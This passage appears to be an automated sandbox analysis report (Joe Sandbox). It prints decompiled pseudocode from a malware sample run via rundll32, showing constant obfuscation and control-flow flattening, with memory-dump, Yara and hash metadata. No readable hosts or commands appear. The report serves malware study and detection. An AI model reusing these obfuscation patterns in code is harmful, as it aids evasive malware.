                                                                                                                    				_v1692 = _v1692 + 0xffff6b87;
                                                                                                                    				_v1692 = _v1692 + 0xffff176e;
                                                                                                                    				_v1692 = _v1692 ^ 0x0004c90f;
                                                                                                                    				_v1668 = 0x5abcaa;
                                                                                                                    				_v1668 = _v1668 | 0xa6adf3e3;
                                                                                                                    				_v1668 = _v1668 + 0xffff713c;
                                                                                                                    				_v1668 = _v1668 << 6;
                                                                                                                    				_v1668 = _v1668 ^ 0xbfd49dc8;
                                                                                                                    				_v1700 = 0xb35187;
                                                                                                                    				_v1700 = _v1700 | 0x50a44dff;
                                                                                                                    				_v1700 = _v1700 + 0xfffff2e6;
                                                                                                                    				_v1700 = _v1700 >> 8;
                                                                                                                    				_v1700 = _v1700 ^ 0x0051b9c1;
                                                                                                                    				_v1644 = 0x4d7cc3;
                                                                                                                    				_v1644 = _v1644 + 0xffffa786;
                                                                                                                    				_v1644 = _v1644 | 0x8b8a715e;
                                                                                                                    				_v1644 = _v1644 ^ 0x6234f021;
                                                                                                                    				_v1644 = _v1644 ^ 0xe9f998a6;
                                                                                                                    				_v1624 = 0x204c5b;
                                                                                                                    				_v1624 = _v1624 + 0xffffa901;
                                                                                                                    				_v1624 = _v1624 + 0x49e1;
                                                                                                                    				_v1624 = _v1624 ^ 0x002fe6aa;
                                                                                                                    				_v1632 = 0xbb0a9b;
                                                                                                                    				_v1632 = _v1632 * 0x52;
                                                                                                                    				_v1632 = _v1632 | 0x83893080;
                                                                                                                    				_v1632 = _v1632 ^ 0xbbe905c0;
                                                                                                                    				_v1620 = 0x19fb1a;
                                                                                                                    				_v1620 = _v1620 | 0x985eae3d;
                                                                                                                    				_v1620 = _v1620 + 0xf613;
                                                                                                                    				_v1620 = _v1620 ^ 0x9864c971;
                                                                                                                    				_v1656 = 0x35ecb4;
                                                                                                                    				_v1656 = _v1656 * 0x29;
                                                                                                                    				_v1656 = _v1656 + 0x1081;
                                                                                                                    				_v1656 = _v1656 + 0xffffd324;
                                                                                                                    				_v1656 = _v1656 ^ 0x08a8fe56;
                                                                                                                    				_v1580 = 0xc60f6f;
                                                                                                                    				_v1580 = _v1580 + 0xffffd3e6;
                                                                                                                    				_v1580 = _v1580 ^ 0x00c233ea;
                                                                                                                    				_v1664 = 0x2df5c;
                                                                                                                    				_v1664 = _v1664 << 8;
                                                                                                                    				_v1664 = _v1664 * 0x4c;
                                                                                                                    				_v1664 = _v1664 + 0xffffaed7;
                                                                                                                    				_v1664 = _v1664 ^ 0xda40187b;
                                                                                                                    				_v1672 = 0x38409b;
                                                                                                                    				_v1672 = _v1672 * 0x33;
                                                                                                                    				_v1672 = _v1672 | 0x7fcdffbb;
                                                                                                                    				_v1672 = _v1672 ^ 0x7ff87770;
                                                                                                                    				_v1680 = 0xe751cb;
                                                                                                                    				_v1680 = _v1680 ^ 0x8590ed7d;
                                                                                                                    				_v1680 = _v1680 + 0xffffebc9;
                                                                                                                    				_v1680 = _v1680 * 0x5e;
                                                                                                                    				_v1680 = _v1680 ^ 0x01e2719c;
                                                                                                                    				_v1688 = 0x15e1cd;
                                                                                                                    				_v1688 = _v1688 + 0xfe19;
                                                                                                                    				_v1688 = _v1688 + 0xffffc88c;
                                                                                                                    				_v1688 = _v1688 << 7;
                                                                                                                    				_v1688 = _v1688 ^ 0x0b5f3deb;
                                                                                                                    				_v1696 = 0x33a377;
                                                                                                                    				_v1696 = _v1696 << 0xa;
                                                                                                                    				_v1696 = _v1696 ^ 0xfb2d04b5;
                                                                                                                    				_v1696 = _v1696 | 0xd2f07883;
                                                                                                                    				_v1696 = _v1696 ^ 0xf7fa7ce3;
                                                                                                                    				_v1640 = 0x94004d;
                                                                                                                    				_v1640 = _v1640 >> 0xa;
                                                                                                                    				_t438 = 0x67;
                                                                                                                    				_v1640 = _v1640 * 0x3d;
                                                                                                                    				_v1640 = _v1640 >> 7;
                                                                                                                    				_v1640 = _v1640 ^ 0x00039ca1;
                                                                                                                    				_v1648 = 0xfcfef3;
                                                                                                                    				_v1648 = _v1648 * 0x18;
                                                                                                                    				_v1648 = _v1648 + 0x9c71;
                                                                                                                    				_v1648 = _v1648 | 0xf5d6202a;
                                                                                                                    				_v1648 = _v1648 ^ 0xf7f57601;
                                                                                                                    				_v1596 = 0xc58f80;
                                                                                                                    				_v1596 = _v1596 + 0xffff2f17;
                                                                                                                    				_v1596 = _v1596 ^ 0x00ce700d;
                                                                                                                    				_v1684 = 0xee980b;
                                                                                                                    				_v1684 = _v1684 >> 6;
                                                                                                                    				_v1684 = _v1684 / _t438;
                                                                                                                    				_v1684 = _v1684 + 0xffff2a3f;
                                                                                                                    				_v1684 = _v1684 ^ 0xfff3655c;
                                                                                                                    				_v1652 = 0x45a4a9;
                                                                                                                    				_v1652 = _v1652 >> 0xe;
                                                                                                                    				_t439 = 0x6e;
                                                                                                                    				_v1652 = _v1652 * 0x51;
                                                                                                                    				_v1652 = _v1652 + 0x9be3;
                                                                                                                    				_v1652 = _v1652 ^ 0x0004d4d8;
                                                                                                                    				_v1708 = 0x222243;
                                                                                                                    				_t176 =  &_v1708; // 0x222243
                                                                                                                    				_v1708 =  *_t176 / _t439;
                                                                                                                    				_v1708 = _v1708 << 9;
                                                                                                                    				_v1708 = _v1708 + 0xffff4a12;
                                                                                                                    				_v1708 = _v1708 ^ 0x009b5339;
                                                                                                                    				_v1612 = 0x464ea3;
                                                                                                                    				_v1612 = _v1612 + 0x89cc;
                                                                                                                    				_v1612 = _v1612 >> 2;
                                                                                                                    				_v1612 = _v1612 ^ 0x00167067;
                                                                                                                    				_v1588 = 0xd74d9e;
                                                                                                                    				_v1588 = _v1588 | 0x529da741;
                                                                                                                    				_v1588 = _v1588 ^ 0x52d09c78;
                                                                                                                    				_v1628 = 0x60b5eb;
                                                                                                                    				_v1628 = _v1628 >> 9;
                                                                                                                    				_t440 = 0x19;
                                                                                                                    				_v1628 = _v1628 / _t440;
                                                                                                                    				_v1628 = _v1628 ^ 0x000ff1bc;
                                                                                                                    				_v1676 = 0xfb7b01;
                                                                                                                    				_v1676 = _v1676 << 4;
                                                                                                                    				_v1676 = _v1676 + 0xffffc28e;
                                                                                                                    				_t441 = 0x1b;
                                                                                                                    				_v1676 = _v1676 / _t441;
                                                                                                                    				_v1676 = _v1676 ^ 0x0096cb21;
                                                                                                                    				_v1660 = 0xed67c1;
                                                                                                                    				_v1660 = _v1660 << 0xa;
                                                                                                                    				_v1660 = _v1660 | 0xef7d69c8;
                                                                                                                    				_v1660 = _v1660 << 2;
                                                                                                                    				_v1660 = _v1660 ^ 0xfff42fe1;
                                                                                                                    				_v1604 = 0x46c7e8;
                                                                                                                    				_v1604 = _v1604 << 0xf;
                                                                                                                    				_v1604 = _v1604 ^ 0x63fe3710;
                                                                                                                    				_v1636 = 0x7a345b;
                                                                                                                    				_v1636 = _v1636 + 0xd479;
                                                                                                                    				_v1636 = _v1636 + 0x8c7f;
                                                                                                                    				_v1636 = _v1636 ^ 0x00708a00;
                                                                                                                    				_v1704 = 0x80508e;
                                                                                                                    				_v1704 = _v1704 ^ 0xf958081f;
                                                                                                                    				_t442 = 0x4b;
                                                                                                                    				_v1704 = _v1704 / _t442;
                                                                                                                    				_t443 = 0x34;
                                                                                                                    				_v1704 = _v1704 * 0x44;
                                                                                                                    				_v1704 = _v1704 ^ 0xe2885afb;
                                                                                                                    				_v1576 = 0x325f4f;
                                                                                                                    				_t259 =  &_v1576; // 0x325f4f
                                                                                                                    				_v1576 =  *_t259 * 0x7a;
                                                                                                                    				_v1576 = _v1576 ^ 0x180920ed;
                                                                                                                    				_v1592 = 0xd554f9;
                                                                                                                    				_v1592 = _v1592 * 0x4e;
                                                                                                                    				_v1592 = _v1592 ^ 0x40f8e8dd;
                                                                                                                    				_v1608 = 0x6be570;
                                                                                                                    				_v1608 = _v1608 + 0x3d4f;
                                                                                                                    				_v1608 = _v1608 ^ 0x4461575c;
                                                                                                                    				_v1608 = _v1608 ^ 0x440eeedf;
                                                                                                                    				_v1616 = 0x4acfbf;
                                                                                                                    				_v1616 = _v1616 / _t443;
                                                                                                                    				_t444 = 0xe;
                                                                                                                    				_v1616 = _v1616 / _t444;
                                                                                                                    				_v1616 = _v1616 ^ 0x000fdd65;
                                                                                                                    				_v1600 = 0x55de88;
                                                                                                                    				_v1600 = _v1600 << 2;
                                                                                                                    				_v1600 = _v1600 ^ 0x01580110;
                                                                                                                    				do {
                                                                                                                    					while(_t396 != 0x196a97b) {
                                                                                                                    						if(_t396 == 0x2ca432c) {
                                                                                                                    							_push(_v1652);
                                                                                                                    							_push(_v1684);
                                                                                                                    							_t379 = E0034DCF7(_v1596, 0x3310f0, __eflags);
                                                                                                                    							E0034176B( &_v1560, __eflags);
                                                                                                                    							_t382 =  *0x353e10; // 0x0
                                                                                                                    							_t385 =  *0x353e10; // 0x0
                                                                                                                    							E0034E32E(_v1612, __eflags, _t379, _v1588,  &_v1040, _v1628, _t385 + 0x23c, _v1676,  &_v520, _v1660, _v1604, _v1636, _t436, _t382 + 0x1c,  &_v1560);
                                                                                                                    							E0033A8B0(_v1704, _t379, _v1576);
                                                                                                                    							_t449 =  &(_t449[0xf]);
                                                                                                                    							_t396 = 0x9d0e956;
                                                                                                                    							continue;
                                                                                                                    						} else {
                                                                                                                    							if(_t396 == 0x9368da1) {
                                                                                                                    								_push(_v1644);
                                                                                                                    								_push(_v1584);
                                                                                                                    								_push(_v1700);
                                                                                                                    								_push( &_v1040);
                                                                                                                    								E003446BB(_v1692, _v1668);
                                                                                                                    								_t449 = _t449 - 0xc + 0x1c;
                                                                                                                    								_t396 = 0x196a97b;
                                                                                                                    								continue;
                                                                                                                    							} else {
                                                                                                                    								_t456 = _t396 - 0x9d0e956;
                                                                                                                    								if(_t396 != 0x9d0e956) {
                                                                                                                    									goto L10;
                                                                                                                    								} else {
                                                                                                                    									_push(_v1600);
                                                                                                                    									_push(_t436);
                                                                                                                    									_push(_t396);
                                                                                                                    									_push(_t436);
                                                                                                                    									_push(_t436);
                                                                                                                    									_push(_v1616);
                                                                                                                    									_push( &_v520);
                                                                                                                    									E0033AB87(_v1592, _v1608, _t456);
                                                                                                                    									_t436 =  !=  ? 1 : _t436;
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						L6:
                                                                                                                    						return _t436;
                                                                                                                    					}
                                                                                                                    					_push(_v1620);
                                                                                                                    					_push(_v1632);
                                                                                                                    					_t370 = E0034DCF7(_v1624, 0x331020, __eflags);
                                                                                                                    					E0034176B( &_v1560, __eflags);
                                                                                                                    					_t399 =  *0x353e10; // 0x0
                                                                                                                    					_t336 = _t399 + 0x1c; // 0x1c
                                                                                                                    					_t337 = _t399 + 0x23c; // 0x23c
                                                                                                                    					E00341652(_v1580, __eflags, _t337, _t336, _v1664, _v1672, _t370, 0x104,  &_v520, _v1680,  &_v1040, _v1688,  &_v1560, _v1696);
                                                                                                                    					E0033A8B0(_v1640, _t370, _v1648);
                                                                                                                    					_t449 =  &(_t449[0xf]);
                                                                                                                    					_t396 = 0x9d0e956;
                                                                                                                    					L10:
                                                                                                                    					__eflags = _t396 - 0xce3b296;
                                                                                                                    				} while (__eflags != 0);
                                                                                                                    				goto L6;
                                                                                                                    			}
                                                                                                                    0x0034cf29
                                                                                                                    0x0034cf35
                                                                                                                    0x0034cf38
                                                                                                                    0x0034cf3c
                                                                                                                    0x0034cf44
                                                                                                                    0x0034cf4c
                                                                                                                    0x0034cf51
                                                                                                                    0x0034cf5b
                                                                                                                    0x0034cf65
                                                                                                                    0x0034cf72
                                                                                                                    0x0034cf7a
                                                                                                                    0x0034cf7f
                                                                                                                    0x0034cf87
                                                                                                                    0x0034cf8f
                                                                                                                    0x0034cf97
                                                                                                                    0x0034cf9f
                                                                                                                    0x0034cfa7
                                                                                                                    0x0034cfaf
                                                                                                                    0x0034cfbd
                                                                                                                    0x0034cfc2
                                                                                                                    0x0034cfcd
                                                                                                                    0x0034cfd0
                                                                                                                    0x0034cfd4
                                                                                                                    0x0034cfdc
                                                                                                                    0x0034cfe7
                                                                                                                    0x0034cfef
                                                                                                                    0x0034cff6
                                                                                                                    0x0034d001
                                                                                                                    0x0034d014
                                                                                                                    0x0034d01b
                                                                                                                    0x0034d026
                                                                                                                    0x0034d02e
                                                                                                                    0x0034d036
                                                                                                                    0x0034d03e
                                                                                                                    0x0034d046
                                                                                                                    0x0034d056
                                                                                                                    0x0034d05e
                                                                                                                    0x0034d061
                                                                                                                    0x0034d065
                                                                                                                    0x0034d06d
                                                                                                                    0x0034d075
                                                                                                                    0x0034d07a
                                                                                                                    0x0034d082
                                                                                                                    0x0034d082
                                                                                                                    0x0034d090
                                                                                                                    0x0034d119
                                                                                                                    0x0034d122
                                                                                                                    0x0034d12d
                                                                                                                    0x0034d13b
                                                                                                                    0x0034d149
                                                                                                                    0x0034d16e
                                                                                                                    0x0034d19b
                                                                                                                    0x0034d1ad
                                                                                                                    0x0034d1b2
                                                                                                                    0x0034d1b5
                                                                                                                    0x00000000
                                                                                                                    0x0034d096
                                                                                                                    0x0034d09c
                                                                                                                    0x0034d0e8
                                                                                                                    0x0034d0f3
                                                                                                                    0x0034d0fa
                                                                                                                    0x0034d109
                                                                                                                    0x0034d10a
                                                                                                                    0x0034d10f
                                                                                                                    0x0034d112
                                                                                                                    0x00000000
                                                                                                                    0x0034d09e
                                                                                                                    0x0034d09e
                                                                                                                    0x0034d0a0
                                                                                                                    0x00000000
                                                                                                                    0x0034d0a6
                                                                                                                    0x0034d0a6
                                                                                                                    0x0034d0b1
                                                                                                                    0x0034d0b2
                                                                                                                    0x0034d0b3
                                                                                                                    0x0034d0b4
                                                                                                                    0x0034d0b5
                                                                                                                    0x0034d0ca
                                                                                                                    0x0034d0cb
                                                                                                                    0x0034d0d8
                                                                                                                    0x0034d0d8
                                                                                                                    0x0034d0a0
                                                                                                                    0x0034d09c
                                                                                                                    0x0034d0db
                                                                                                                    0x0034d0e7
                                                                                                                    0x0034d0e7
                                                                                                                    0x0034d1bc
                                                                                                                    0x0034d1c5
                                                                                                                    0x0034d1cd
                                                                                                                    0x0034d1db
                                                                                                                    0x0034d212
                                                                                                                    0x0034d21f
                                                                                                                    0x0034d223
                                                                                                                    0x0034d22e
                                                                                                                    0x0034d243
                                                                                                                    0x0034d248
                                                                                                                    0x0034d24b
                                                                                                                    0x0034d24d
                                                                                                                    0x0034d24d
                                                                                                                    0x0034d24d
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FolderPath
                                                                                                                    • String ID: ;@B$C""$M$O_2$[4z$[L $\WaD$I
                                                                                                                    • API String ID: 1514166925-553023378
                                                                                                                    • Opcode ID: 844dea79e61c175fe943ccf09396ae73981a340b4748174b305675e6f8c48915
                                                                                                                    • Instruction ID: d2fd87b41c391905616e27448f901eb971d8d9eb1caa52f8ed90c7c756bba997
                                                                                                                    • Opcode Fuzzy Hash: 844dea79e61c175fe943ccf09396ae73981a340b4748174b305675e6f8c48915
                                                                                                                    • Instruction Fuzzy Hash: 1D021FB15083819FD365CF25C98AA9BFBE5FBC4718F10891DF1D98A260D7B1894ACF42
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 94%
                                                                                                                    			E003370B3(void* __ecx, intOrPtr* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                    				intOrPtr _v4;
                                                                                                                    				intOrPtr _v8;
                                                                                                                    				char _v12;
                                                                                                                    				intOrPtr _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				signed int _v28;
                                                                                                                    				signed int _v32;
                                                                                                                    				signed int _v36;
                                                                                                                    				signed int _v40;
                                                                                                                    				signed int _v44;
                                                                                                                    				signed int _v48;
                                                                                                                    				signed int _v52;
                                                                                                                    				signed int _v56;
                                                                                                                    				signed int _v60;
                                                                                                                    				signed int _v64;
                                                                                                                    				signed int _v68;
                                                                                                                    				signed int _v72;
                                                                                                                    				signed int _v76;
                                                                                                                    				signed int _v80;
                                                                                                                    				signed int _v84;
                                                                                                                    				signed int _v88;
                                                                                                                    				signed int _v92;
                                                                                                                    				signed int _v96;
                                                                                                                    				signed int _v100;
                                                                                                                    				signed int _v104;
                                                                                                                    				signed int _v108;
                                                                                                                    				signed int _v112;
                                                                                                                    				signed int _v116;
                                                                                                                    				signed int _v120;
                                                                                                                    				signed int _v124;
                                                                                                                    				signed int _v128;
                                                                                                                    				void* _t276;
                                                                                                                    				intOrPtr _t301;
                                                                                                                    				void* _t302;
                                                                                                                    				intOrPtr _t305;
                                                                                                                    				void* _t306;
                                                                                                                    				intOrPtr _t312;
                                                                                                                    				intOrPtr* _t314;
                                                                                                                    				void* _t316;
                                                                                                                    				intOrPtr _t340;
                                                                                                                    				signed int _t343;
                                                                                                                    				signed int _t344;
                                                                                                                    				signed int _t345;
                                                                                                                    				signed int _t346;
                                                                                                                    				signed int _t347;
                                                                                                                    				signed int _t348;
                                                                                                                    				signed int _t349;
                                                                                                                    				signed int* _t352;
                                                                                                                    
                                                                                                                    				_t342 = _a4;
                                                                                                                    				_t314 = __edx;
                                                                                                                    				_push(_a12);
                                                                                                                    				_push(_a8);
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(__edx);
                                                                                                                    				_push(__ecx);
                                                                                                                    				E003420B9(_t276);
                                                                                                                    				_v8 = 0xc5496b;
                                                                                                                    				_t340 = 0;
                                                                                                                    				_v4 = 0;
                                                                                                                    				_t352 =  &(( &_v128)[5]);
                                                                                                                    				_v96 = 0xa893e5;
                                                                                                                    				_v96 = _v96 >> 0xb;
                                                                                                                    				_t316 = 0x77ea95;
                                                                                                                    				_v96 = _v96 ^ 0xaec74c08;
                                                                                                                    				_v96 = _v96 + 0xffff5908;
                                                                                                                    				_v96 = _v96 ^ 0xaec6b223;
                                                                                                                    				_v120 = 0x460837;
                                                                                                                    				_v120 = _v120 << 0xe;
                                                                                                                    				_t343 = 0x61;
                                                                                                                    				_v120 = _v120 / _t343;
                                                                                                                    				_v120 = _v120 ^ 0xba448c5d;
                                                                                                                    				_v120 = _v120 ^ 0xbb13b056;
                                                                                                                    				_v100 = 0x5f60bb;
                                                                                                                    				_t344 = 0x67;
                                                                                                                    				_v100 = _v100 / _t344;
                                                                                                                    				_v100 = _v100 << 2;
                                                                                                                    				_v100 = _v100 << 0xe;
                                                                                                                    				_v100 = _v100 ^ 0xed0e0000;
                                                                                                                    				_v104 = 0xcda695;
                                                                                                                    				_t345 = 0x65;
                                                                                                                    				_v104 = _v104 * 0x11;
                                                                                                                    				_v104 = _v104 + 0xffffbfc8;
                                                                                                                    				_v104 = _v104 / _t345;
                                                                                                                    				_v104 = _v104 ^ 0x00229cab;
                                                                                                                    				_v88 = 0xcb9151;
                                                                                                                    				_v88 = _v88 + 0x59e9;
                                                                                                                    				_v88 = _v88 ^ 0x7c8ac0da;
                                                                                                                    				_v88 = _v88 >> 0xc;
                                                                                                                    				_v88 = _v88 ^ 0x0007c412;
                                                                                                                    				_v124 = 0xc27732;
                                                                                                                    				_v124 = _v124 << 5;
                                                                                                                    				_v124 = _v124 * 0x69;
                                                                                                                    				_v124 = _v124 >> 0xd;
                                                                                                                    				_v124 = _v124 ^ 0x0007c2e3;
                                                                                                                    				_v108 = 0xd451e;
                                                                                                                    				_v108 = _v108 | 0x03d9c36b;
                                                                                                                    				_v108 = _v108 << 0x10;
                                                                                                                    				_v108 = _v108 >> 7;
                                                                                                                    				_v108 = _v108 ^ 0x018efe00;
                                                                                                                    				_v24 = 0xe3266e;
                                                                                                                    				_v24 = _v24 ^ 0xb39ac5a6;
                                                                                                                    				_v24 = _v24 ^ 0xb37ebd00;
                                                                                                                    				_v60 = 0xdd6dbc;
                                                                                                                    				_v60 = _v60 << 0xc;
                                                                                                                    				_v60 = _v60 >> 0xd;
                                                                                                                    				_v60 = _v60 ^ 0x00066ea0;
                                                                                                                    				_v92 = 0xdc27c1;
                                                                                                                    				_v92 = _v92 ^ 0xb7b3afa8;
                                                                                                                    				_t346 = 0x51;
                                                                                                                    				_v92 = _v92 / _t346;
                                                                                                                    				_v92 = _v92 >> 0xb;
                                                                                                                    				_v92 = _v92 ^ 0x000e15f4;
                                                                                                                    				_v28 = 0x55985f;
                                                                                                                    				_t347 = 0x64;
                                                                                                                    				_v28 = _v28 * 0x1f;
                                                                                                                    				_v28 = _v28 ^ 0x0a58c7ef;
                                                                                                                    				_v64 = 0x4cb0ae;
                                                                                                                    				_v64 = _v64 * 0x59;
                                                                                                                    				_v64 = _v64 + 0xffff44f7;
                                                                                                                    				_v64 = _v64 ^ 0x1aa02a50;
                                                                                                                    				_v32 = 0x4c255b;
                                                                                                                    				_v32 = _v32 >> 0xc;
                                                                                                                    				_v32 = _v32 ^ 0x000ba021;
                                                                                                                    				_v68 = 0x1bdf1a;
                                                                                                                    				_v68 = _v68 << 0xe;
                                                                                                                    				_v68 = _v68 << 8;
                                                                                                                    				_v68 = _v68 ^ 0xc683e60f;
                                                                                                                    				_v36 = 0xeace7c;
                                                                                                                    				_v36 = _v36 ^ 0x32d1e31b;
                                                                                                                    				_v36 = _v36 ^ 0x32395a0e;
                                                                                                                    				_v52 = 0x5778bf;
                                                                                                                    				_v52 = _v52 * 0x53;
                                                                                                                    				_v52 = _v52 ^ 0x1c501c28;
                                                                                                                    				_v56 = 0x56e07;
                                                                                                                    				_v56 = _v56 / _t347;
                                                                                                                    				_v56 = _v56 ^ 0x000a0e4e;
                                                                                                                    				_v128 = 0x2ec397;
                                                                                                                    				_v128 = _v128 + 0xffff4016;
                                                                                                                    				_v128 = _v128 ^ 0xc29a5f5c;
                                                                                                                    				_v128 = _v128 << 0xa;
                                                                                                                    				_v128 = _v128 ^ 0xd1754ce1;
                                                                                                                    				_v112 = 0x486dea;
                                                                                                                    				_t159 =  &_v112; // 0x486dea
                                                                                                                    				_t348 = 0x16;
                                                                                                                    				_v112 =  *_t159 * 0x75;
                                                                                                                    				_v112 = _v112 << 3;
                                                                                                                    				_v112 = _v112 + 0xffff4e4a;
                                                                                                                    				_v112 = _v112 ^ 0x08d01f1a;
                                                                                                                    				_v116 = 0xad5672;
                                                                                                                    				_v116 = _v116 << 0xa;
                                                                                                                    				_v116 = _v116 * 0x32;
                                                                                                                    				_v116 = _v116 >> 1;
                                                                                                                    				_v116 = _v116 ^ 0x35c1a461;
                                                                                                                    				_v40 = 0x750aef;
                                                                                                                    				_v40 = _v40 << 0xe;
                                                                                                                    				_v40 = _v40 ^ 0x42b6a378;
                                                                                                                    				_v72 = 0x7e8fee;
                                                                                                                    				_v72 = _v72 << 0xe;
                                                                                                                    				_v72 = _v72 + 0x885b;
                                                                                                                    				_v72 = _v72 ^ 0xa3f43c0d;
                                                                                                                    				_v44 = 0x717d1a;
                                                                                                                    				_v44 = _v44 >> 0xf;
                                                                                                                    				_v44 = _v44 ^ 0x000f68d6;
                                                                                                                    				_v48 = 0x815897;
                                                                                                                    				_v48 = _v48 / _t348;
                                                                                                                    				_v48 = _v48 ^ 0x000d4a68;
                                                                                                                    				_v76 = 0xfbb4ce;
                                                                                                                    				_v76 = _v76 << 8;
                                                                                                                    				_v76 = _v76 + 0xffffed69;
                                                                                                                    				_v76 = _v76 ^ 0xfbbe0169;
                                                                                                                    				_v80 = 0xf07394;
                                                                                                                    				_v80 = _v80 << 0xf;
                                                                                                                    				_v80 = _v80 ^ 0x34c45092;
                                                                                                                    				_v80 = _v80 ^ 0x0d009df4;
                                                                                                                    				_v84 = 0xfdde74;
                                                                                                                    				_v84 = _v84 * 0x78;
                                                                                                                    				_v84 = _v84 << 7;
                                                                                                                    				_v84 = _v84 << 0xa;
                                                                                                                    				_v84 = _v84 ^ 0x8cc67a91;
                                                                                                                    				_v20 = 0xbaf80d;
                                                                                                                    				_t349 = 0x4e;
                                                                                                                    				_v20 = _v20 / _t349;
                                                                                                                    				_v20 = _v20 ^ 0x000183d9;
                                                                                                                    				do {
                                                                                                                    					while(_t316 != 0x77ea95) {
                                                                                                                    						if(_t316 == 0x220b753) {
                                                                                                                    							_t301 =  *0x353dfc; // 0x0
                                                                                                                    							_t302 = E00345B3B(_t316, _v24,  *((intOrPtr*)(_t342 + 4)),  *((intOrPtr*)(_t301 + 0x64)),  *_t342, _v60, _v92, _v96, _t340,  &_v12, _v100, _v104, _v28, _t316, _v64, _v32, _v68, _v36);
                                                                                                                    							_t352 =  &(_t352[0x10]);
                                                                                                                    							if(_t302 == _v88) {
                                                                                                                    								_t316 = 0xd86d689;
                                                                                                                    								continue;
                                                                                                                    							}
                                                                                                                    						} else {
                                                                                                                    							if(_t316 == 0xd7ced6e) {
                                                                                                                    								_t305 =  *0x353dfc; // 0x0
                                                                                                                    								_t306 = E00345B3B(_t316, _v112,  *((intOrPtr*)(_t342 + 4)),  *((intOrPtr*)(_t305 + 0x64)),  *_t342, _v116, _v40, _v120, _v16,  &_v12, _v12, _v124, _v72, _t316, _v44, _v48, _v76, _v80);
                                                                                                                    								_t352 =  &(_t352[0x10]);
                                                                                                                    								if(_t306 == _v108) {
                                                                                                                    									 *_t314 = _v16;
                                                                                                                    									_t340 = 1;
                                                                                                                    									 *((intOrPtr*)(_t314 + 4)) = _v12;
                                                                                                                    								} else {
                                                                                                                    									_t316 = 0xf392ab6;
                                                                                                                    									continue;
                                                                                                                    								}
                                                                                                                    							} else {
                                                                                                                    								if(_t316 == 0xd86d689) {
                                                                                                                    									_push(_t316);
                                                                                                                    									_push(_t316);
                                                                                                                    									_t312 = E00337FF2(_v12);
                                                                                                                    									_v16 = _t312;
                                                                                                                    									if(_t312 != 0) {
                                                                                                                    										_t316 = 0xd7ced6e;
                                                                                                                    										continue;
                                                                                                                    									}
                                                                                                                    								} else {
                                                                                                                    									if(_t316 != 0xf392ab6) {
                                                                                                                    										goto L14;
                                                                                                                    									} else {
                                                                                                                    										E00348519(_v84, _v20, _v16);
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						L17:
                                                                                                                    						return _t340;
                                                                                                                    					}
                                                                                                                    					_t316 = 0x220b753;
                                                                                                                    					L14:
                                                                                                                    				} while (_t316 != 0xf4b6a65);
                                                                                                                    				goto L17;
                                                                                                                    			}
                                                                                                                    0x003373ea
                                                                                                                    0x003373ee
                                                                                                                    0x003373f6
                                                                                                                    0x003373fe
                                                                                                                    0x00337403
                                                                                                                    0x0033740b
                                                                                                                    0x00337413
                                                                                                                    0x0033741b
                                                                                                                    0x00337420
                                                                                                                    0x00337428
                                                                                                                    0x00337430
                                                                                                                    0x0033743d
                                                                                                                    0x00337443
                                                                                                                    0x00337448
                                                                                                                    0x0033744d
                                                                                                                    0x00337455
                                                                                                                    0x00337463
                                                                                                                    0x0033746b
                                                                                                                    0x0033746f
                                                                                                                    0x00337477
                                                                                                                    0x00337477
                                                                                                                    0x00337485
                                                                                                                    0x00337592
                                                                                                                    0x003375a6
                                                                                                                    0x003375ab
                                                                                                                    0x003375b2
                                                                                                                    0x003375b4
                                                                                                                    0x00000000
                                                                                                                    0x003375b4
                                                                                                                    0x0033748b
                                                                                                                    0x00337491
                                                                                                                    0x00337531
                                                                                                                    0x00337542
                                                                                                                    0x00337547
                                                                                                                    0x0033754e
                                                                                                                    0x003375d7
                                                                                                                    0x003375d9
                                                                                                                    0x003375e1
                                                                                                                    0x00337550
                                                                                                                    0x00337550
                                                                                                                    0x00000000
                                                                                                                    0x00337550
                                                                                                                    0x00337493
                                                                                                                    0x00337499
                                                                                                                    0x003374d4
                                                                                                                    0x003374d5
                                                                                                                    0x003374d6
                                                                                                                    0x003374db
                                                                                                                    0x003374e6
                                                                                                                    0x003374ec
                                                                                                                    0x00000000
                                                                                                                    0x003374ec
                                                                                                                    0x0033749b
                                                                                                                    0x003374a1
                                                                                                                    0x00000000
                                                                                                                    0x003374a7
                                                                                                                    0x003374b6
                                                                                                                    0x003374bb
                                                                                                                    0x003374a1
                                                                                                                    0x00337499
                                                                                                                    0x00337491
                                                                                                                    0x003375e4
                                                                                                                    0x003375f0
                                                                                                                    0x003375f0
                                                                                                                    0x003375be
                                                                                                                    0x003375c0
                                                                                                                    0x003375c0
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: [%L$hJ$n&$n|$n|$u$Y$mH
                                                                                                                    • API String ID: 0-2314355462
                                                                                                                    • Opcode ID: af9e1fa6d42ca2ef492040537a1319c052bf9d5522c3d27ce82b2ba089b66b4c
